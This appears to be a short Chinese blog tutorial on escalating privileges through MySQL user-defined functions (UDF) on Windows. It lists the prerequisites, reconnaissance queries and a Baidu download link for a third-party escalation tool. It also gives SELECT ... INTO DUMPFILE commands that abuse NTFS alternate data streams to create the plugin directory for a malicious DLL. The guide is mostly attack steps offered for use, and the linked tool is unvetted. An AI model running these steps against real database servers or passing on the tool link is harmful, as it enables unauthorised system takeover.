0x00 介紹
本篇我們來講無webshell時利用udf進行提權
0x01 前提
1. 必須是root權限(主要是得創建和拋棄自定義函數)
2. secure_file_priv=(未寫路徑)
3. 將udf.dll文件上傳到MySQL的plugin目錄下(這里以MySQL>=5.1為例)
0x02 提權中用到的查詢語句
1 SELECT version(); #查詢數據庫版本 2
3 SELECT @@basedir; #查詢MySQL的安裝目錄 4
5 SELECT user(); #查詢當前用戶 6
7 SHOW VARIABLES LIKE '%plugins%'; #查找是否有plugins目錄 8
9 show variables like '%compile%'; #查看數據庫位數
0x03 工具
暗月工具
下載地址:https://pan.baidu.com/s/1EoGKX6bksOCFGgonFvfgYw 提取碼:8ng0 個人感覺這個工具依然需要在plugin文件夾存在的前提下 打開工具頁面如下:
接下來直接執行命令即可
這工具真的是太香了
ps:
這里補充一點,
這里的關鍵是lib目錄下沒有plugin文件夾,得突破限制創建文件夾
還有一種創建plugin文件夾的方式(我沒成功過,有緣的小伙伴可能會成功)
一般Lib、Plugin文件夾需要手工建立(可用NTFS ADS流模式突破進而創建文件夾)
select @@basedir; //查找到mysql的目錄
select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib::$INDEX_ALLOCATION'; //利用NTFS ADS創建lib目錄
select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin::$INDEX_ALLOCATION'; //利用NTFS ADS創建plugin目錄